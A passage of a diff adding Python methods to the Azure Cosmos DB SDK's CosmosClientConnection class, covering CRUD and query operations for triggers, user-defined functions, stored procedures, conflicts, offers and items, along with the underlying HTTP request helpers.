**kwargs) + + def QueryTriggers(self, collection_link, query, options=None, **kwargs): + """Queries triggers in a collection. + + :param str collection_link: + The link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Triggers. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link, "triggers") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, "triggers", collection_id, lambda r: r["Triggers"], lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def CreateTrigger(self, collection_link, trigger, options=None, **kwargs): + """Creates a trigger in a collection. + + :param str collection_link: + The link to the document collection. + :param dict trigger: + :param dict options: + The request options for the request. + + :return: + The created Trigger. + :rtype: + dict + + """ + if options is None: + options = {} + + collection_id, path, trigger = self._GetContainerIdWithPathForTrigger(collection_link, trigger) + return self.Create(trigger, path, "triggers", collection_id, None, options, **kwargs) + + def UpsertTrigger(self, collection_link, trigger, options=None, **kwargs): + """Upserts a trigger in a collection. + + :param str collection_link: + The link to the document collection. + :param dict trigger: + :param dict options: + The request options for the request. + + :return: + The upserted Trigger. + :rtype: + dict + + """ + if options is None: + options = {} + + collection_id, path, trigger = self._GetContainerIdWithPathForTrigger(collection_link, trigger) + return self.Upsert(trigger, path, "triggers", collection_id, None, options, **kwargs) + + def _GetContainerIdWithPathForTrigger(self, collection_link, trigger): # pylint: disable=no-self-use + CosmosClientConnection.__ValidateResource(trigger) + trigger = trigger.copy() + if trigger.get("serverScript"): + trigger["body"] = str(trigger.pop("serverScript", "")) + elif trigger.get("body"): + trigger["body"] = str(trigger["body"]) + + path = base.GetPathFromLink(collection_link, "triggers") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return collection_id, path, trigger + + def ReadTrigger(self, trigger_link, options=None, **kwargs): + """Reads a trigger. + + :param str trigger_link: + The link to the trigger. + :param dict options: + The request options for the request. + + :return: + The read Trigger. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(trigger_link) + trigger_id = base.GetResourceIdOrFullNameFromLink(trigger_link) + return self.Read(path, "triggers", trigger_id, None, options, **kwargs) + + def ReadUserDefinedFunctions(self, collection_link, options=None, **kwargs): + """Reads all user-defined functions in a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + Query Iterable of UDFs. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryUserDefinedFunctions(collection_link, None, options, **kwargs) + + def QueryUserDefinedFunctions(self, collection_link, query, options=None, **kwargs): + """Queries user-defined functions in a collection. + + :param str collection_link: + The link to the collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of UDFs. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link, "udfs") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, "udfs", collection_id, lambda r: r["UserDefinedFunctions"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def CreateUserDefinedFunction(self, collection_link, udf, options=None, **kwargs): + """Creates a user-defined function in a collection. + + :param str collection_link: + The link to the collection. + :param str udf: + :param dict options: + The request options for the request. + + :return: + The created UDF. + :rtype: + dict + + """ + if options is None: + options = {} + + collection_id, path, udf = self._GetContainerIdWithPathForUDF(collection_link, udf) + return self.Create(udf, path, "udfs", collection_id, None, options, **kwargs) + + def UpsertUserDefinedFunction(self, collection_link, udf, options=None, **kwargs): + """Upserts a user-defined function in a collection. + + :param str collection_link: + The link to the collection. + :param str udf: + :param dict options: + The request options for the request. + + :return: + The upserted UDF. + :rtype: + dict + + """ + if options is None: + options = {} + + collection_id, path, udf = self._GetContainerIdWithPathForUDF(collection_link, udf) + return self.Upsert(udf, path, "udfs", collection_id, None, options, **kwargs) + + def _GetContainerIdWithPathForUDF(self, collection_link, udf): # pylint: disable=no-self-use + CosmosClientConnection.__ValidateResource(udf) + udf = udf.copy() + if udf.get("serverScript"): + udf["body"] = str(udf.pop("serverScript", "")) + elif udf.get("body"): + udf["body"] = str(udf["body"]) + + path = base.GetPathFromLink(collection_link, "udfs") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return collection_id, path, udf + + def ReadUserDefinedFunction(self, udf_link, options=None, **kwargs): + """Reads a user-defined function. + + :param str udf_link: + The link to the user-defined function. + :param dict options: + The request options for the request. + + :return: + The read UDF. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(udf_link) + udf_id = base.GetResourceIdOrFullNameFromLink(udf_link) + return self.Read(path, "udfs", udf_id, None, options, **kwargs) + + def ReadStoredProcedures(self, collection_link, options=None, **kwargs): + """Reads all store procedures in a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + Query Iterable of Stored Procedures. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryStoredProcedures(collection_link, None, options, **kwargs) + + def QueryStoredProcedures(self, collection_link, query, options=None, **kwargs): + """Queries stored procedures in a collection. + + :param str collection_link: + The link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Stored Procedures. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link, "sprocs") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, "sprocs", collection_id, lambda r: r["StoredProcedures"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def CreateStoredProcedure(self, collection_link, sproc, options=None, **kwargs): + """Creates a stored procedure in a collection. + + :param str collection_link: + The link to the document collection. + :param str sproc: + :param dict options: + The request options for the request. + + :return: + The created Stored Procedure. + :rtype: + dict + + """ + if options is None: + options = {} + + collection_id, path, sproc = self._GetContainerIdWithPathForSproc(collection_link, sproc) + return self.Create(sproc, path, "sprocs", collection_id, None, options, **kwargs) + + def UpsertStoredProcedure(self, collection_link, sproc, options=None, **kwargs): + """Upserts a stored procedure in a collection. + + :param str collection_link: + The link to the document collection. + :param str sproc: + :param dict options: + The request options for the request. + + :return: + The upserted Stored Procedure. + :rtype: + dict + + """ + if options is None: + options = {} + + collection_id, path, sproc = self._GetContainerIdWithPathForSproc(collection_link, sproc) + return self.Upsert(sproc, path, "sprocs", collection_id, None, options, **kwargs) + + def _GetContainerIdWithPathForSproc(self, collection_link, sproc): # pylint: disable=no-self-use + CosmosClientConnection.__ValidateResource(sproc) + sproc = sproc.copy() + if sproc.get("serverScript"): + sproc["body"] = str(sproc.pop("serverScript", "")) + elif sproc.get("body"): + sproc["body"] = str(sproc["body"]) + path = base.GetPathFromLink(collection_link, "sprocs") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return collection_id, path, sproc + + def ReadStoredProcedure(self, sproc_link, options=None, **kwargs): + """Reads a stored procedure. + + :param str sproc_link: + The link to the stored procedure. + :param dict options: + The request options for the request. + + :return: + The read Stored Procedure. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(sproc_link) + sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link) + return self.Read(path, "sprocs", sproc_id, None, options, **kwargs) + + def ReadConflicts(self, collection_link, feed_options=None, **kwargs): + """Reads conflicts. + + :param str collection_link: + The link to the document collection. + :param dict feed_options: + + :return: + Query Iterable of Conflicts. + :rtype: + query_iterable.QueryIterable + + """ + if feed_options is None: + feed_options = {} + + return self.QueryConflicts(collection_link, None, feed_options, **kwargs) + + def QueryConflicts(self, collection_link, query, options=None, **kwargs): + """Queries conflicts in a collection. + + :param str collection_link: + The link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Conflicts. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link, "conflicts") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, "conflicts", collection_id, lambda r: r["Conflicts"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReadConflict(self, conflict_link, options=None, **kwargs): + """Reads a conflict. + + :param str conflict_link: + The link to the conflict. + :param dict options: + + :return: + The read Conflict. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(conflict_link) + conflict_id = base.GetResourceIdOrFullNameFromLink(conflict_link) + return self.Read(path, "conflicts", conflict_id, None, options, **kwargs) + + def DeleteContainer(self, collection_link, options=None, **kwargs): + """Deletes a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + The deleted Collection. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link) + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return self.DeleteResource(path, "colls", collection_id, None, options, **kwargs) + + def ReplaceItem(self, document_link, new_document, options=None, **kwargs): + """Replaces a document and returns it. + + :param str document_link: + The link to the document. + :param dict new_document: + :param dict options: + The request options for the request. + + :return: + The new Document. + :rtype: + dict + + """ + CosmosClientConnection.__ValidateResource(new_document) + path = base.GetPathFromLink(document_link) + document_id = base.GetResourceIdOrFullNameFromLink(document_link) + + # Python's default arguments are evaluated once when the function is defined, + # not each time the function is called (like it is in say, Ruby). This means + # that if you use a mutable default argument and mutate it, you will and have + # mutated that object for all future calls to the function as well. So, using + # a non-mutable deafult in this case(None) and assigning an empty dict(mutable) + # inside the function so that it remains local For more details on this gotcha, + # please refer http://docs.python-guide.org/en/latest/writing/gotchas/ + if options is None: + options = {} + + # Extract the document collection link and add the partition key to options + collection_link = base.GetItemContainerLink(document_link) + options = self._AddPartitionKey(collection_link, new_document, options) + + return self.Replace(new_document, path, "docs", document_id, None, options, **kwargs) + + def DeleteItem(self, document_link, options=None, **kwargs): + """Deletes a document. + + :param str document_link: + The link to the document. + :param dict options: + The request options for the request. + + :return: + The deleted Document. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(document_link) + document_id = base.GetResourceIdOrFullNameFromLink(document_link) + return self.DeleteResource(path, "docs", document_id, None, options, **kwargs) + + def ReplaceTrigger(self, trigger_link, trigger, options=None, **kwargs): + """Replaces a trigger and returns it. + + :param str trigger_link: + The link to the trigger. + :param dict trigger: + :param dict options: + The request options for the request. + + :return: + The replaced Trigger. + :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(trigger) + trigger = trigger.copy() + if trigger.get("serverScript"): + trigger["body"] = str(trigger.pop("serverScript", "")) + elif trigger.get("body"): + trigger["body"] = str(trigger["body"]) + + path = base.GetPathFromLink(trigger_link) + trigger_id = base.GetResourceIdOrFullNameFromLink(trigger_link) + return self.Replace(trigger, path, "triggers", trigger_id, None, options, **kwargs) + + def DeleteTrigger(self, trigger_link, options=None, **kwargs): + """Deletes a trigger. + + :param str trigger_link: + The link to the trigger. + :param dict options: + The request options for the request. + + :return: + The deleted Trigger. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(trigger_link) + trigger_id = base.GetResourceIdOrFullNameFromLink(trigger_link) + return self.DeleteResource(path, "triggers", trigger_id, None, options, **kwargs) + + def ReplaceUserDefinedFunction(self, udf_link, udf, options=None, **kwargs): + """Replaces a user-defined function and returns it. + + :param str udf_link: + The link to the user-defined function. + :param dict udf: + :param dict options: + The request options for the request. + + :return: + The new UDF. + :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(udf) + udf = udf.copy() + if udf.get("serverScript"): + udf["body"] = str(udf.pop("serverScript", "")) + elif udf.get("body"): + udf["body"] = str(udf["body"]) + + path = base.GetPathFromLink(udf_link) + udf_id = base.GetResourceIdOrFullNameFromLink(udf_link) + return self.Replace(udf, path, "udfs", udf_id, None, options, **kwargs) + + def DeleteUserDefinedFunction(self, udf_link, options=None, **kwargs): + """Deletes a user-defined function. + + :param str udf_link: + The link to the user-defined function. + :param dict options: + The request options for the request. + + :return: + The deleted UDF. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(udf_link) + udf_id = base.GetResourceIdOrFullNameFromLink(udf_link) + return self.DeleteResource(path, "udfs", udf_id, None, options, **kwargs) + + def ExecuteStoredProcedure(self, sproc_link, params, options=None, **kwargs): + """Executes a store procedure. + + :param str sproc_link: + The link to the stored procedure. + :param dict params: + List or None + :param dict options: + The request options for the request. + + :return: + The Stored Procedure response. + :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = dict(self.default_headers) + initial_headers.update({http_constants.HttpHeaders.Accept: (runtime_constants.MediaTypes.Json)}) + + if params and not isinstance(params, list): + params = [params] + + path = base.GetPathFromLink(sproc_link) + sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link) + headers = base.GetHeaders(self, initial_headers, "post", path, sproc_id, "sprocs", options) + + # ExecuteStoredProcedure will use WriteEndpoint since it uses POST operation + request_params = _request_object.RequestObject("sprocs", documents._OperationType.ExecuteJavaScript) + result, self.last_response_headers = self.__Post(path, request_params, params, headers, **kwargs) + return result + + def ReplaceStoredProcedure(self, sproc_link, sproc, options=None, **kwargs): + """Replaces a stored procedure and returns it. + + :param str sproc_link: + The link to the stored procedure. + :param dict sproc: + :param dict options: + The request options for the request. + + :return: + The replaced Stored Procedure. + :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(sproc) + sproc = sproc.copy() + if sproc.get("serverScript"): + sproc["body"] = str(sproc.pop("serverScript", "")) + elif sproc.get("body"): + sproc["body"] = str(sproc["body"]) + + path = base.GetPathFromLink(sproc_link) + sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link) + return self.Replace(sproc, path, "sprocs", sproc_id, None, options, **kwargs) + + def DeleteStoredProcedure(self, sproc_link, options=None, **kwargs): + """Deletes a stored procedure. + + :param str sproc_link: + The link to the stored procedure. + :param dict options: + The request options for the request. + + :return: + The deleted Stored Procedure. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(sproc_link) + sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link) + return self.DeleteResource(path, "sprocs", sproc_id, None, options, **kwargs) + + def DeleteConflict(self, conflict_link, options=None, **kwargs): + """Deletes a conflict. + + :param str conflict_link: + The link to the conflict. + :param dict options: + The request options for the request. + + :return: + The deleted Conflict. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(conflict_link) + conflict_id = base.GetResourceIdOrFullNameFromLink(conflict_link) + return self.DeleteResource(path, "conflicts", conflict_id, None, options, **kwargs) + + def ReplaceOffer(self, offer_link, offer, **kwargs): + """Replaces an offer and returns it. + + :param str offer_link: + The link to the offer. + :param dict offer: + + :return: + The replaced Offer. + :rtype: + dict + + """ + CosmosClientConnection.__ValidateResource(offer) + path = base.GetPathFromLink(offer_link) + offer_id = base.GetResourceIdOrFullNameFromLink(offer_link) + return self.Replace(offer, path, "offers", offer_id, None, None, **kwargs) + + def ReadOffer(self, offer_link, **kwargs): + """Reads an offer. + + :param str offer_link: + The link to the offer. + + :return: + The read Offer. + :rtype: + dict + + """ + path = base.GetPathFromLink(offer_link) + offer_id = base.GetResourceIdOrFullNameFromLink(offer_link) + return self.Read(path, "offers", offer_id, None, {}, **kwargs) + + def ReadOffers(self, options=None, **kwargs): + """Reads all offers. + + :param dict options: + The request options for the request + + :return: + Query Iterable of Offers. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryOffers(None, options, **kwargs) + + def QueryOffers(self, query, options=None, **kwargs): + """Query for all offers. + + :param (str or dict) query: + :param dict options: + The request options for the request + + :return: + Query Iterable of Offers. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + def fetch_fn(options): + return ( + self.__QueryFeed( + "/offers", "offers", "", lambda r: r["Offers"], lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def GetDatabaseAccount(self, url_connection=None, **kwargs): + """Gets database account info. + + :return: + The Database Account. + :rtype: + documents.DatabaseAccount + + """ + if url_connection is None: + url_connection = self.url_connection + + initial_headers = dict(self.default_headers) + headers = base.GetHeaders(self, initial_headers, "get", "", "", "", {}) # path # id # type + + request_params = _request_object.RequestObject("databaseaccount", documents._OperationType.Read, url_connection) + result, self.last_response_headers = self.__Get("", request_params, headers, **kwargs) + database_account = documents.DatabaseAccount() + database_account.DatabasesLink = "/dbs/" + database_account.MediaLink = "/media/" + if http_constants.HttpHeaders.MaxMediaStorageUsageInMB in self.last_response_headers: + database_account.MaxMediaStorageUsageInMB = self.last_response_headers[ + http_constants.HttpHeaders.MaxMediaStorageUsageInMB + ] + if http_constants.HttpHeaders.CurrentMediaStorageUsageInMB in self.last_response_headers: + database_account.CurrentMediaStorageUsageInMB = self.last_response_headers[ + http_constants.HttpHeaders.CurrentMediaStorageUsageInMB + ] + database_account.ConsistencyPolicy = result.get(constants._Constants.UserConsistencyPolicy) + + # WritableLocations and ReadableLocations fields will be available only for geo-replicated database accounts + if constants._Constants.WritableLocations in result: + database_account._WritableLocations = result[constants._Constants.WritableLocations] + if constants._Constants.ReadableLocations in result: + database_account._ReadableLocations = result[constants._Constants.ReadableLocations] + if constants._Constants.EnableMultipleWritableLocations in result: + database_account._EnableMultipleWritableLocations = result[ + constants._Constants.EnableMultipleWritableLocations + ] + + self._useMultipleWriteLocations = ( + self.connection_policy.UseMultipleWriteLocations and database_account._EnableMultipleWritableLocations + ) + return database_account + + def Create(self, body, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin + """Creates a Azure Cosmos resource and returns it. + + :param dict body: + :param str path: + :param str typ: + :param str id: + :param dict initial_headers: + :param dict options: + The request options for the request. + + :return: + The created Azure Cosmos resource. + :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = initial_headers or self.default_headers + headers = base.GetHeaders(self, initial_headers, "post", path, id, typ, options) + # Create will use WriteEndpoint since it uses POST operation + + request_params = _request_object.RequestObject(typ, documents._OperationType.Create) + result, self.last_response_headers = self.__Post(path, request_params, body, headers, **kwargs) + + # update session for write request + self._UpdateSessionIfRequired(headers, result, self.last_response_headers) + return result + + def Upsert(self, body, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin + """Upserts a Azure Cosmos resource and returns it. + + :param dict body: + :param str path: + :param str typ: + :param str id: + :param dict initial_headers: + :param dict options: + The request options for the request. + + :return: + The upserted Azure Cosmos resource. + :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = initial_headers or self.default_headers + headers = base.GetHeaders(self, initial_headers, "post", path, id, typ, options) + + headers[http_constants.HttpHeaders.IsUpsert] = True + + # Upsert will use WriteEndpoint since it uses POST operation + request_params = _request_object.RequestObject(typ, documents._OperationType.Upsert) + result, self.last_response_headers = self.__Post(path, request_params, body, headers, **kwargs) + # update session for write request + self._UpdateSessionIfRequired(headers, result, self.last_response_headers) + return result + + def Replace(self, resource, path, typ, id, initial_headers, options=None, + **kwargs): # pylint: disable=redefined-builtin + """Replaces a Azure Cosmos resource and returns it. + + :param dict resource: + :param str path: + :param str typ: + :param str id: + :param dict initial_headers: + :param dict options: + The request options for the request. + + :return: + The new Azure Cosmos resource. + :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = initial_headers or self.default_headers + headers = base.GetHeaders(self, initial_headers, "put", path, id, typ, options) + # Replace will use WriteEndpoint since it uses PUT operation + request_params = _request_object.RequestObject(typ, documents._OperationType.Replace) + result, self.last_response_headers = self.__Put(path, request_params, resource, headers, **kwargs) + + # update session for request mutates data on server side + self._UpdateSessionIfRequired(headers, result, self.last_response_headers) + return result + + def Read(self, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin + """Reads a Azure Cosmos resource and returns it. + + :param str path: + :param str typ: + :param str id: + :param dict initial_headers: + :param dict options: + The request options for the request. + + :return: + The upserted Azure Cosmos resource. + :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = initial_headers or self.default_headers + headers = base.GetHeaders(self, initial_headers, "get", path, id, typ, options) + # Read will use ReadEndpoint since it uses GET operation + request_params = _request_object.RequestObject(typ, documents._OperationType.Read) + result, self.last_response_headers = self.__Get(path, request_params, headers, **kwargs) + return result + + def DeleteResource(self, path, typ, id, initial_headers, options=None, + **kwargs): # pylint: disable=redefined-builtin + """Deletes a Azure Cosmos resource and returns it. + + :param str path: + :param str typ: + :param str id: + :param dict initial_headers: + :param dict options: + The request options for the request. + + :return: + The deleted Azure Cosmos resource. + :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = initial_headers or self.default_headers + headers = base.GetHeaders(self, initial_headers, "delete", path, id, typ, options) + # Delete will use WriteEndpoint since it uses DELETE operation + request_params = _request_object.RequestObject(typ, documents._OperationType.Delete) + result, self.last_response_headers = self.__Delete(path, request_params, headers, **kwargs) + + # update session for request mutates data on server side + self._UpdateSessionIfRequired(headers, result, self.last_response_headers) + + return result + + def __Get(self, path, request_params, req_headers, **kwargs): + """Azure Cosmos 'GET' http request. + + :params str url: + :params str path: + :params dict req_headers: + + :return: + Tuple of (result, headers). + :rtype: + tuple of (dict, dict) + + """ + request = self.pipeline_client.get(url=path, headers=req_headers) + return synchronized_request.SynchronizedRequest( + client=self, + request_params=request_params, + global_endpoint_manager=self._global_endpoint_manager, + connection_policy=self.connection_policy, + pipeline_client=self.pipeline_client, + request=request, + request_data=None, + **kwargs + ) + + def __Post(self, path, request_params, body, req_headers, **kwargs): + """Azure Cosmos 'POST' http request. + + :params str url: + :params str path: + :params (str, unicode, dict) body: + :params dict req_headers: + + :return: + Tuple of (result, headers). + :rtype: + tuple of (dict, dict) + + """ + request = self.pipeline_client.post(url=path, headers=req_headers) + return synchronized_request.SynchronizedRequest( + client=self, + request_params=request_params, + global_endpoint_manager=self._global_endpoint_manager, + connection_policy=self.connection_policy, + pipeline_client=self.pipeline_client, + request=request, + request_data=body, + **kwargs + ) + + def __Put(self, path, request_params, body, req_headers, **kwargs): + """Azure Cosmos 'PUT' http request. + + :params str url: + :params str path: + :params (str, unicode, dict) body: + :params dict req_headers: + + :return: + Tuple of (result, headers). + :rtype: + tuple of (dict, dict) + + """ + request = self.pipeline_client.put(url=path, headers=req_headers) + return synchronized_request.SynchronizedRequest( + client=self, + request_params=request_params, + global_endpoint_manager=self._global_endpoint_manager, + connection_policy=self.connection_policy, + pipeline_client=self.pipeline_client, + request=request, + request_data=body, + **kwargs + ) + + def __Delete(self, path, request_params, req_headers, **kwargs): + """Azure Cosmos 'DELETE' http request. + + :params str url: + :params str path: + :params dict req_headers: + + :return: + Tuple of (result, headers). + :rtype: + tuple of (dict, dict) + + """ + request = self.pipeline_client.delete(url=path, headers=req_headers) + return synchronized_request.SynchronizedRequest( + client=self, + request_params=request_params, + global_endpoint_manager=self._global_endpoint_manager, + connection_policy=self.connection_policy, + pipeline_client=self.pipeline_client, + request=request, + request_data=None, + **kwargs + ) + + def QueryFeed(self, path, collection_id, query, options, partition_key_range_id=None, **kwargs): + """Query Feed for Document Collection resource. + + :param str path: + Path to the document collection. + :param str collection_id: + Id of the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + :param str partition_key_range_id: + Partition key range id. + :rtype: + tuple + + """ + return ( + self.__QueryFeed( + path, + "docs", + collection_id, + lambda r: r["Documents"], + lambda _, b: b, + query, + options, + partition_key_range_id, + **kwargs + ), + self.last_response_headers, + ) + + def __QueryFeed( + self, + path, + typ, + id_, + result_fn, + create_fn, + query, + options=None, + partition_key_range_id=None, + response_hook=None, + is_query_plan=False, + **kwargs + ): + """Query for more than one Azure Cosmos resources. + + :param str path: + :param str typ: + :param str id_: + :param function result_fn: + :param function create_fn: + :param (str or dict) query: + :param dict options: + The request options for the request. + :param str partition_key_range_id: + Specifies partition key range id. + :param function response_hook: + :param bool is_query_plan: + Specififes if the call is to fetch query plan + + :rtype: + list + + :raises SystemError: If the query compatibility mode is undefined. + + """ + if options is None: + options = {} + + if query: + __GetBodiesFromQueryResult = result_fn + else: + + def __GetBodiesFromQueryResult(result): + if result is not None: + return [create_fn(self, body) for body in result_fn(result)] + # If there is no change feed, the result data is empty and result is None. + # This case should be interpreted as an empty array. + return [] + + initial_headers = self.default_headers.copy() + # Copy to make sure that default_headers won't be changed. + if query is None: + # Query operations will use ReadEndpoint even though it uses GET(for feed requests) + request_params = _request_object.RequestObject( + typ, documents._OperationType.QueryPlan if is_query_plan else documents._OperationType.ReadFeed) + headers = base.GetHeaders(self, initial_headers, "get", path, id_, typ, options, partition_key_range_id) + result, self.last_response_headers = self.__Get(path, request_params, headers, **kwargs) + if response_hook: + response_hook(self.last_response_headers, result) + return __GetBodiesFromQueryResult(result) + + query = self.__CheckAndUnifyQueryFormat(query) + + initial_headers[http_constants.HttpHeaders.IsQuery] = "true" + if not is_query_plan: + initial_headers[http_constants.HttpHeaders.IsQuery] = "true" + + if ( + self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Default + or self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Query + ): + initial_headers[http_constants.HttpHeaders.ContentType] = runtime_constants.MediaTypes.QueryJson + elif self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.SqlQuery: + initial_headers[http_constants.HttpHeaders.ContentType] = runtime_constants.MediaTypes.SQL + else: + raise SystemError("Unexpected query compatibility mode.") + + # Query operations will use ReadEndpoint even though it uses POST(for regular query operations) + request_params = _request_object.RequestObject(typ, documents._OperationType.SqlQuery) + req_headers = base.GetHeaders(self, initial_headers, "post", path, id_, typ, options, partition_key_range_id) + result, self.last_response_headers = self.__Post(path, request_params, query, req_headers, **kwargs) + + if response_hook: + response_hook(self.last_response_headers, result) + + return __GetBodiesFromQueryResult(result) + + def _GetQueryPlanThroughGateway(self, query, resource_link, **kwargs): + supported_query_features = (documents._QueryFeature.Aggregate + "," + + documents._QueryFeature.CompositeAggregate + "," + + documents._QueryFeature.Distinct + "," + + documents._QueryFeature.MultipleOrderBy + "," + + documents._QueryFeature.OffsetAndLimit + "," + + documents._QueryFeature.OrderBy + "," + + documents._QueryFeature.Top) + + options = { + "contentType": runtime_constants.MediaTypes.Json, + "isQueryPlanRequest": True, + "supportedQueryFeatures": supported_query_features, + "queryVersion": http_constants.Versions.QueryVersion + } + + resource_link = base.TrimBeginningAndEndingSlashes(resource_link) + path = base.GetPathFromLink(resource_link, "docs") + resource_id = base.GetResourceIdOrFullNameFromLink(resource_link) + + return self.__QueryFeed(path, + "docs", + resource_id, + lambda r: r, + None, + query, + options, + is_query_plan=True, + **kwargs) + + def __CheckAndUnifyQueryFormat(self, query_body): + """Checks and unifies the format of the query body. + + :raises TypeError: If query_body is not of expected type (depending on the query compatibility mode). + :raises ValueError: If query_body is a dict but doesn\'t have valid query text. + :raises SystemError: If the query compatibility mode is undefined. + + :param (str or dict) query_body: + + :return: + The formatted query body. + :rtype: + dict or string + """ + if ( + self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Default + or self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Query + ): + if not isinstance(query_body, dict) and not isinstance(query_body, str): + raise TypeError("query body must be a dict or string.") + if isinstance(query_body, dict) and not query_body.get("query"): + raise ValueError('query body must have valid query text with key "query".') + if isinstance(query_body, str): + return {"query": query_body} + elif ( + self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.SqlQuery + and not isinstance(query_body, str) + ): + raise TypeError("query body must be a string.") + else: + raise SystemError("Unexpected query compatibility mode.") + + return query_body + + @staticmethod + def __ValidateResource(resource): + id_ = resource.get("id") + if id_: + try: + if id_.find("/") != -1 or id_.find("\\") != -1 or id_.find("?") != -1 or id_.find("#") != -1: + raise ValueError("Id contains illegal chars.") + + if id_[-1] == " ": + raise ValueError("Id ends with a space.") + except AttributeError: + raise_with_traceback(TypeError, message="Id type must be a string.") + + # Adds the partition key to options + def _AddPartitionKey(self, collection_link, document, options): + collection_link = base.TrimBeginningAndEndingSlashes(collection_link) + + # TODO: Refresh the cache if partition is extracted automatically and we get a 400.1001 + + # If the document collection link is present in the cache, then use the cached partitionkey definition + if collection_link in self.partition_key_definition_cache: + partitionKeyDefinition = self.partition_key_definition_cache.get(collection_link) + # Else read the collection from backend and add it to the cache + else: + collection = self.ReadContainer(collection_link) + partitionKeyDefinition = collection.get("partitionKey") + self.partition_key_definition_cache[collection_link] = partitionKeyDefinition + + # If the collection doesn't have a partition key definition, skip it as it's a legacy collection + if partitionKeyDefinition: + # If the user has passed in the partitionKey in options use that elase extract it from the document + if "partitionKey" not in options: + partitionKeyValue = self._ExtractPartitionKey(partitionKeyDefinition, document) + options["partitionKey"] = partitionKeyValue + + return options + + # Extracts the partition key from the document using the partitionKey definition + def _ExtractPartitionKey(self, partitionKeyDefinition, document): + + # Parses the paths into a list of token each representing a property + partition_key_parts = base.ParsePaths(partitionKeyDefinition.get("paths")) + # Check if the partitionKey is system generated or not + is_system_key = partitionKeyDefinition["systemKey"] if "systemKey" in partitionKeyDefinition else False + + # Navigates the document to retrieve the partitionKey specified in the paths + return self._retrieve_partition_key(partition_key_parts, document, is_system_key) + + # Navigates 